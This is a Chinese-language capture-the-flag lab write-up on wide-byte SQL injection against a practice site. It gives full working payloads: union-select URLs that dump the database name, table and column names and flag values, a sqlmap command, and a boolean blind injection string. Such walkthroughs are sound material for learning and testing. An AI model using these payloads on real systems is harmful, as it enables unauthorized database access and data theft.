宽字节注入(一)
查询数据库名
http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df‘ union select 1,2,database() -- qwe
得出数据库名:widechar
查询当前库下表名
http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe
得出表名:china_flag,user
查询china_flag表下字段名
http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df‘ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x6368696e615f666c6167 -- qwe
得出china_flag表下字段名:Id,C_Flag
查询数据
http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df‘ union select 1,2,group_concat(C_Flag) from china_flag -- qwe
得出flag:zKaQ-Wide,zKaQ-CAIK,zKaQ-Kzj+mz
经验证,zKaQ-Wide为最终flag
宽字节注入(二)
大体注入流程与(一)一样,只不过需要提供的是%df‘) -- qwe
这里我们直接采用sqlmap进行注入
sqlmap -u "http://inject2b.lab.aqlab.cn/Pass-16/index.php?id=1" --level 3 --risk 2 --batch
得出flag:zKaQ-Wide,zKaQ-CAIK,zKaQ-Kzj+mz
经验证,zKaQ-CAIK为最终flag
宽字节注入(三)
可以采用抓包后修改%25df为%df注入进行测试|提供一个汉字然后‘) -- qwe进行测试
神‘) or ascii(substr((select database()),1,1))=119 -- qwe
得出flag:zKaQ-Wide,zKaQ-CAIK,zKaQ-Kzj+mz
经验证,zKaQ-Kzj+mz为最终flag